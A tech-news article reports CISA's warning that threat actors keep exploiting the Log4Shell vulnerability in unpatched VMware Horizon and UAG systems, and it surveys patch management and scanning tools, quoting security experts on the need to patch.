We are excited to bring Transform 2022 back in-person July 19 and virtually July 20 – 28. Join AI and data leaders for insightful talks and exciting networking opportunities. Register today!
Last week, the Cybersecurity and Infrastructure Security Agency (CISA) issued a warning notifying organizations that malicious threat actors are continuing to exploit the zero-day Log4Shell vulnerability in VMware Horizon and Unified Access Gateway (UAG) to obtain initial access to target systems without the necessary patches.
One of the most alarming elements of the report was that CISA recommends all organizations with affected systems that haven’t deployed patches “assume compromise and initiate threat hunting activities.”
Above all, the notice highlights that enterprises who haven’t patched Log4Shell are still at risk, and at the very least need to deploy available patches to their systems, if not take steps to remediate an intrusion.
A look at the history of Log4Shell
Alibaba’s cloud security team first discovered and reported the Log4Shell vulnerability to Apache on November 24th last year.
The researchers initially noticed attackers using an exploit in Apache Log4j 2, an open-source library that logs errors and events within Java applications, to remotely execute malicious malicious code to servers and clients running Minecraft.
While Apache patched the vulnerability on December 9th, Log4Shell had already gained a reputation as a serious zero-day vulnerability, that commentators warned would “wreak havoc across the internet for years to come,” with an estimated 3 billion exploitable devices.
As publicity grew over the vulnerability, threat actors began to direct attacks at enterprises across the world, with Microsoft finding an uptick in techniques including mass-scanning, coin mining, establishing remote shells, and red-team activity.
Ever since, the exploit has decreased confidence in third party cloud software to the point where 95% of IT leaders report that Log4Shell was a major wake-up call for cloud security and 87% reporting they feel less confident about their cloud security now than they did prior to the incident.
Is Log4Shell still a threat today?
While it’s been months since Log4Shell was first discovered and many organizations have deployed the necessary vulnerabilities to protect their systems, most haven’t. In fact, in April this year, a Rezilion report found that almost 60% of the affected Log4Shell software packages remain unpatched.
CISAs recent warning highlights that failure to patch these systems could be a costly oversight, given that threat actors are still actively looking for unpatched systems to exploit.
The only way to minimize these zero-day threats is for enterprises to implement an organized patching plan, to ensure that any internet-facing servers are patched and protected.
“Patching is a critical part of any organization’s security plan, and devices connected to the internet while unpatched, especially against a well-known and exploited vulnerability, creates a serious risk for the organizations and their customers,” said security awareness advocate with KnowBe4, Erich Kron.
“While patching can be a challenge and can even pose a real risk of an outage if there are problems, any organizations that have internet-facing devices should have a system in place, and testing to reduce the risk significantly,” Kron said.
The security implications of failing to patch log4j
At this stage in the vulnerability’s lifecycle, failure to patch exposed systems is a serious mistake that indicates an organization has significant gaps in its existing security strategy.
“Patches for log4j versions that are vulnerable to Log4Shell have been available since December. This includes patches for VMware products,” said principal security strategist within the Synopsys Cybersecurity Research Center (CyRC), Tim Mackey.
“Unfortunately, organizations that have yet to patch log4j or VMware Horizon lack a robust patch management strategy, be that a commercial or open source strategy, or have instances of shadow deployments,” Mackey said.
Mackey highlights that while using media outreach to encourage organizations to patch new vulnerabilities can be effective, it isn’t a substitute for proactively monitoring for new exploits.
A look at the solutions addressing Log4Shell
While keeping vulnerabilities patched is easier said than done in complex modern network environments, there are a growing number of patch management solutions that organizations can use to push patches to multiple devices remotely and efficiently.
Many organizations are already using patch management solutions to keep their devices updated, with researchers anticipating that the global patch management market will grow from a value of $652 million in 2022, to reach a valuation of $1084 million by 2027.
For addressing the Log4Shell vulnerability at a more granular level, enterprises can leverage vulnerability scanning tools like PortSwigger BurpSuite Pro, Nmap, and TrendMicro’s Log4J Vulnerability Tester to identify exposed files so they can take action to remediate them.
It’s also worth noting that prominent tech vendors like Microsoft and Google have deployed their own proprietary solutions to help enterprises identify and mitigate Log4j.
For instance, Microsoft expanded Microsoft Defender so that it can scan devices for vulnerability log4j files, and Google Cloud offers Cloud Logging to allow enterprises to query logs for attempts to exploit log4j 2 and issues alerts to notify them when exploit messages are written to logs.
By combining patch management solutions with proactive vulnerability scanning, organizations can consistently identify compromised infrastructure and exploits like log4j before an attacker has a chance to exploit them.